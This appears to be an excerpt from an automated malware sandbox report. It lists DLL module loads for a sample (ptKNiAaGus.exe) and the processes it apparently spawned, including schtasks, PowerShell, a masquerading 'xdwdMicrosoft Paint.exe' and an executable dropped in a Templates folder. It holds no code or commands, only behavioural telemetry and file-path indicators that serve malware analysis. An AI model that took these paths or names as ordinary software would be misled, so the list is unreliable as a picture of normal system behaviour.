Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: usbperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: netfxperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: bitsperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: bitsproxy.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: esentprf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfts.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: utildll.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msdtcuiu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msdtcprx.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: mtxclu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: msscntrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfdisk.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: wmiclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfnet.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfos.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfproc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: sysmain.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: rasctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: tapiperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: perfctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: usbperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: tquery.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
